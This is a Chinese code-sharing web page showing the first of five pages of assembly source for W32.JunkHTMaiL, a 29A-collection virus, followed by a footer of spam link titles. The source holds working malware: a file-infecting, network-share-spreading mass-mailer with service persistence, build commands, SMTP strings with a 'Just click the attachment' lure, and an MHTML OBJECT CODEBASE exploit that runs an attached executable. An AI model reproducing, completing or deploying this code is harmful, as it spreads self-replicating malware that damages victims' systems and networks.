亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.004

?? 從29A上收集的病毒源碼
?? 004
?? 第 1 頁 / 共 5 頁
字號:

comment ;)
W32.JunkHTMaiL by roy g biv (thanks to RT Fishel for previous contribution)

some of its features:
- parasitic resident (own process) infector of PE exe (but not looking at suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal is linked-list instead of recursive to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- slow mailer using polymorphic mail headers and self-executing HTML
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs in writable memory)
- no infect files with data outside of image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before W32.EfishNC :)

yes, just a W32.JunkMail remake with a different exploit
---

  optimisation tip: Windows appends ".dll" automatically, so this works:
        push "cfs"
        push esp
        call LoadLibraryA
---

to build this thing:
tasm
----
tasm32 /ml /m3 junkhtml
tlink32 /B:400000 /x junkhtml,,,import32

Virus is not self-modifying, so no need to alter section attributes
---

We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)

(;

.486
.model  flat

extern  GlobalAlloc:proc
extern  CreateFileA:proc
extern  GetFileSize:proc
extern  GetModuleFileNameA:proc
extern  ReadFile:proc
extern  WriteFile:proc
extern  CloseHandle:proc
extern  GlobalFree:proc
extern  GetCurrentProcess:proc
extern  WriteProcessMemory:proc
extern  MessageBoxA:proc
extern  ExitProcess:proc

.data

;to alter the text here, set compress_only to not-zero then run
;in that case, the compressed text is written to a file only

compress_only   equ     0

ife compress_only

;must be reverse alphabetical order because they are stored on stack
;API names are not present in replications, only in dropper

expnames        db      "WriteFile"           , 0
                db      "WinExec"             , 0
                db      "SetFileAttributesA"  , 0
                db      "MoveFileA"           , 0
                db      "LoadLibraryA"        , 0
                db      "GlobalFree"          , 0
                db      "GlobalAlloc"         , 0
                db      "GetWindowsDirectoryA", 0
                db      "GetTickCount"        , 0
                db      "GetTempFileNameA"    , 0
                db      "GetFileAttributesA"  , 0
                db      "GetCurrentProcess"   , 0
                db      "DeleteFileA"         , 0
                db      "CreateFileA"         , 0
                db      "CloseHandle"         , 0

regnames        db      "RegSetValueA"      , 0
                db      "OpenSCManagerA"    , 0
                db      "CreateServiceA"    , 0
                db      "CloseServiceHandle", 0

exenames        db      "LoadLibraryA"   , 0
                db      "GlobalAlloc"    , 0
                db      "GetVersion"     , 0
                db      "GetTickCount"   , 0
                db      "GetStartupInfoW", 0
                db      "GetStartupInfoA", 0
                db      "GetCommandLineW", 0
                db      "GetCommandLineA", 0
                db      "ExitProcess"    , 0
                db      "CreateProcessW" , 0
                db      "CreateProcessA" , 0

usrnames        db      "CharNextW", 0
                db      "CharNextA", 0

svcnames        db      "StartServiceCtrlDispatcherA", 0

krnnames        db      "lstrlenW"                 , 0
                db      "lstrcpyW"                 , 0
                db      "lstrcatW"                 , 0
                db      "UnmapViewOfFile"          , 0
                db      "Sleep"                    , 0
                db      "SetFileTime"              , 0
                db      "SetFileAttributesW"       , 0
                db      "SetFileAttributesA"       , 0
                db      "SetCurrentDirectoryW"     , 0
                db      "SetCurrentDirectoryA"     , 0
                db      "ReadFile"                 , 0
                db      "MultiByteToWideChar"      , 0
                db      "MapViewOfFile"            , 0
                db      "LoadLibraryA"             , 0
                db      "GlobalFree"               , 0
                db      "GlobalAlloc"              , 0
                db      "GetVersion"               , 0
                db      "GetTickCount"             , 0
                db      "GetModuleFileNameA"       , 0
                db      "GetFullPathNameW"         , 0
                db      "GetFullPathNameA"         , 0
                db      "GetFileSize"              , 0
                db      "GetDriveTypeA"            , 0
                db      "FindNextFileW"            , 0
                db      "FindNextFileA"            , 0
                db      "FindFirstFileW"           , 0
                db      "FindFirstFileA"           , 0
                db      "FindClose"                , 0
                db      "CreateThread"             , 0
                db      "CreateFileW"              , 0
                db      "CreateFileMappingA"       , 0
                db      "CreateFileA"              , 0
                db      "CloseHandle"              , 0

sfcnames        db      "SfcIsFileProtected", 0

ws2names        db      "socket"       , 0
                db      "send"         , 0
                db      "gethostbyname", 0
                db      "connect"      , 0
                db      "WSAStartup"   , 0

netnames        db      "WNetOpenEnumW"    , 0
                db      "WNetOpenEnumA"    , 0
                db      "WNetEnumResourceW", 0
                db      "WNetEnumResourceA", 0
                db      "WNetCloseEnum"    , 0

ip9xnames       db      "NetShareEnum", 0

ipntnames       db      "NetShareEnum"    , 0
                db      "NetApiBufferFree", 0

endif

;only 0dh is required for new line, since 0ah is appended by decompressor

user1           equ     ' '
user2           equ     '/'
user3           equ     ':'                     ;the three most frequent characters

smtp1           db      offset smtp2 - offset $ - 2, "HELO ", 0
smtp2           db      offset smtp3 - offset $ - 2, "MAIL FROM:<>", 0dh, 0
smtp3           db      offset smtp4 - offset $ - 2, "RCPT TO:", 0
smtp4           db      offset header1 - offset $ - 2, "DATA", 0dh, 0
header1         db      offset header2 - offset $ - 2, "FROM: ", 0
header2         db      offset header31 - offset $ - 2, "SUBJECT: Wanna see a e-mail exploit?", 0
header31        db      offset header32 - offset $ - 2, 0dh, "MIME-VERSION:", 0
header32        db      offset part11 - offset $ - 2, "1.0", 0
part11          db      offset part12 - offset $ - 2, "CONTENT-TYPE:", 0
part12          db      offset part13 - offset $ - 2, "MULTIPART/MIXED;", 0
part13          db      offset body1 - offset $ - 2, " BOUNDARY=", 0

body1           db      offset body2 - offset $ - 1
                db      0dh, "Just click the attachment", 0dh
body2           db      offset body3 - offset $ - 1
                db      "If the attachment is blocked by Outlook 2002 then see", 0dh
body3           db      offset body4 - offset $ - 1
                db      "http://support.microsoft.com/support/kb/articles/q290/4/97.asp", 0dh
body4           db      0

part21          db      offset part22 - offset $ - 2, "TEXT/PLAIN;", 0
part22          db      offset part23 - offset $ - 2, " NAME=EMAIL.HTM", 0
part23          db      offset part24 - offset $ - 2, 0dh, "CONTENT-TRANSFER-ENCODING:", 0
part24          db      offset part25 - offset $ - 2, "QUOTED-PRINTABLE", 0
part25          db      offset part26 - offset $ - 2, 0dh, "CONTENT-DISPOSITION:", 0
part26          db      offset part27 - offset $ - 2, "ATTACHMENT", 0
part27          db      offset part28 - offset $ - 2, "CONTENT-LOCATION:FILE:///.EXE", 0
part28          db      offset part31 - offset $ - 2, "BASE64", 0

;just a bit too long for a single line... unless you remove the "moveBy"...

part31          db      offset part32 - offset $ - 1, 0dh, "<SCRIPT>moveBy(9999);with(document)write(", 22h, "<OBJECT CLASSID='CLSID:1BADDEED'"
part32          db      offset part41 - offset $ - 2, "CODEBASE='MHTML:", 22h, "+URL+", 22h, "!FILE:///.EXE'></OBJECT>", 22h, ")</SCRIPT>", 0

part41          db      offset part42 - offset $ - 2, ".", 0dh, 0
part42          db      offset part43 - offset $ - 2, "QUIT", 0dh, 0
part43          equ     $

include junkhtml.inc

txttitle        db      "JunkHTMaiL", 0

if  compress_only
txtbody         db      "compress done", 0
else
txtbody         db      "running...", 0

patch_host      label   near
        pop     ecx
        push    ecx
        call    $ + 5
        pop     eax
        add     eax, offset host_patch - offset $ + 6
        sub     ecx, eax
        push    ecx
        mov     eax, esp
        xor     edi, edi
        push    edi
        push    4
        push    eax
        push    offset host_patch + 1
        push    esi
        call    WriteProcessMemory
        jmp     junkhtml_inf

;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------

junkhtml_inf    proc    near
        pushad
        call    walk_seh

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

expcrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (expcrc_count + 1) dup (0)
expcrcend       label   near
        dd      offset drop_exp - offset expcrcend + 4
        db      "JunkHTMaiL - roy g biv"        ;spam just got harder to remove ;)

walk_seh        label   near
        xor     esi, esi
        lods    dword ptr fs:[esi]
        inc     eax

seh_loop        label   near
        dec     eax
        xchg    esi, eax
        lods    dword ptr [esi]
        inc     eax
        jne     seh_loop
        lods    dword ptr [esi]

;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------

init_findmz     label   near
        inc     eax
        xchg    edi, eax

find_mzhdr      label   near

;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------

        dec     edi                             ;sub 64kb
        xor     di, di                          ;64kb align
        call    is_pehdr
        jne     find_mzhdr
        mov     ebx, edi
        pop     edi

;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------

        mov     esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
        lea     esi, dword ptr [ebx + esi + peexp.expordbase]
        lods    dword ptr [esi]                 ;Ordinal Base
        lea     ebp, dword ptr [eax * 2 + ebx]
        lods    dword ptr [esi]
        lods    dword ptr [esi]
        lods    dword ptr [esi]                 ;Export Address Table RVA
        lea     edx, dword ptr [ebx + eax]
        lods    dword ptr [esi]                 ;Name Pointer Table RVA
        add     ebp, dword ptr [esi]            ;Ordinal Table RVA
        lea     ecx, dword ptr [ebx + eax]
        mov     esi, ecx

push_export     label   near
        push    ecx

get_export      label   near
        lods    dword ptr [esi]
        push    ebx
        add     ebx, eax                        ;Name Pointer VA
        or      eax, -1

crc_outer       label   near
        xor     al, byte ptr [ebx]
        push    8
        pop     ecx

crc_inner       label   near
        add     eax, eax
        jnb     crc_skip
        xor     eax, 4c11db7h                   ;use generator polymonial (see IEEE 802)

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
美女网站色91| 岛国一区二区在线观看| 国产精品嫩草99a| 欧美三级中文字幕在线观看| 国产黑丝在线一区二区三区| 成人app下载| 欧美三级视频在线| 成人av在线网| 久久精品国产99国产精品| 一区二区免费视频| 国产日韩v精品一区二区| 日韩一级二级三级精品视频| 色综合一个色综合亚洲| 成人综合日日夜夜| 秋霞影院一区二区| 亚洲电影第三页| 1024成人网| 国产精品久久久久四虎| 精品处破学生在线二十三| 欧美日韩精品免费| 91福利在线观看| 99久久免费精品| 丰满少妇在线播放bd日韩电影| 免费在线观看视频一区| 亚洲123区在线观看| 亚洲欧美另类久久久精品| 中文久久乱码一区二区| 国产色产综合色产在线视频| 精品福利av导航| 日韩视频在线永久播放| 欧美日韩色一区| 欧洲av一区二区嗯嗯嗯啊| 91丨国产丨九色丨pron| 成人黄色综合网站| 高清在线成人网| 国产v日产∨综合v精品视频| 国产酒店精品激情| 国产专区综合网| 国内精品伊人久久久久av一坑| 日本中文字幕一区二区视频| 五月天一区二区| 天天操天天综合网| 美女视频免费一区| 黄页视频在线91| 蜜臀av一区二区在线观看| 天堂久久一区二区三区| 日韩中文字幕麻豆| 日本伊人色综合网| 久草中文综合在线| 国内精品第一页| 成人毛片视频在线观看| caoporen国产精品视频| 91免费看`日韩一区二区| 91美女在线看| 欧美三级在线看| 91精品国产91综合久久蜜臀| 日韩一区二区三区免费观看| 欧美xxxxx裸体时装秀| 久久久久综合网| 国产精品乱码一区二三区小蝌蚪| 综合久久久久久| 亚洲国产精品久久一线不卡| 日韩精品国产精品| 久久精品国产亚洲高清剧情介绍 | 日韩亚洲欧美中文三级| 精品国产乱码久久久久久图片 | 精品国产电影一区二区 | 尤物在线观看一区| 天天影视网天天综合色在线播放| 久久国产婷婷国产香蕉| 成人午夜激情影院| 欧美亚洲综合久久| 精品日韩一区二区三区| 国产精品的网站| 日韩精品亚洲专区| 国产精品伊人色| 日本二三区不卡| 精品美女一区二区| 中文字幕亚洲不卡| 午夜视频在线观看一区二区| 激情欧美日韩一区二区| 91免费在线看| 日韩精品一区二区三区在线| 国产精品久久久久影院亚瑟| 天天色综合天天| 不卡的电视剧免费网站有什么| 欧美日韩三级视频| 中文字幕av不卡| 婷婷亚洲久悠悠色悠在线播放| 国产老妇另类xxxxx| 欧洲国内综合视频| 欧美国产一区二区| 日韩不卡一区二区三区| av中文字幕不卡| 日韩欧美在线综合网| 亚洲欧美日本韩国| 国内精品嫩模私拍在线| 欧美三区在线观看| 亚洲日本一区二区| 国产乱码精品一区二区三区五月婷| 在线看一区二区| 国产欧美视频在线观看| 日本不卡在线视频| 91精品91久久久中77777| ww久久中文字幕| 丝袜美腿亚洲色图| 91在线无精精品入口| 久久女同性恋中文字幕| 日韩国产一二三区| 色天使色偷偷av一区二区| 久久无码av三级| 青娱乐精品视频| 欧美日韩视频第一区| 亚洲欧美视频一区| 成人av在线影院| 久久精品亚洲麻豆av一区二区| 婷婷成人激情在线网| 欧美图区在线视频| 亚洲欧美另类图片小说| 成人福利在线看| 国产亚洲福利社区一区| 久久99精品久久久久久| 777xxx欧美| 图片区小说区区亚洲影院| 日本国产一区二区| 亚洲精品国产成人久久av盗摄| av电影在线观看一区| 国产精品美女www爽爽爽| 国产成人免费视| 日本一区二区三区四区| 国产不卡视频在线观看| 久久久久久一二三区| 国产精品一二三在| 久久婷婷色综合| 国产乱码一区二区三区| 国产亚洲va综合人人澡精品| 激情综合色丁香一区二区| 日韩精品一区二区在线观看| 久久99最新地址| 久久久久免费观看| 成人福利电影精品一区二区在线观看| 国产偷国产偷亚洲高清人白洁| 国产在线不卡视频| 久久精品人人做人人综合 | 91在线观看免费视频| 国产精品久久久久久久久晋中| 成人黄色大片在线观看| 亚洲男人的天堂av| 欧美性大战久久| 肉色丝袜一区二区| 日韩精品一区二区三区四区视频 | 日本一区二区视频在线观看| 成人综合在线网站| 亚洲天天做日日做天天谢日日欢 | 欧美一区二区日韩| 麻豆成人91精品二区三区| 2023国产精华国产精品| 成人美女视频在线观看| 夜夜嗨av一区二区三区中文字幕| 欧美视频在线观看一区| 免费观看久久久4p| 中文字幕国产一区| 91福利区一区二区三区| 日韩精品国产欧美| 国产亚洲视频系列| 一本大道久久a久久综合| 肉丝袜脚交视频一区二区| 日韩亚洲欧美中文三级| 成人福利视频网站| 首页亚洲欧美制服丝腿| 久久久久久久久久久黄色| 91在线国内视频| 青青草97国产精品免费观看无弹窗版| 久久久综合精品| 91麻豆精东视频| 美美哒免费高清在线观看视频一区二区| wwww国产精品欧美| 欧美影视一区在线| 国内精品视频一区二区三区八戒| 亚洲少妇30p| 欧美一区二区播放| aaa欧美日韩| 免费看精品久久片| 中文字幕一区三区| 欧美一二三在线| 91浏览器入口在线观看| 久久99国产精品久久99| 一区二区成人在线| 久久精品视频网| 7878成人国产在线观看| av在线一区二区三区| 韩日精品视频一区| 亚洲一二三四久久| 国产嫩草影院久久久久| 国产精品资源站在线| 日本在线不卡视频| 亚洲精品五月天| 国产精品欧美一区二区三区| 日韩午夜在线观看| 精品视频色一区|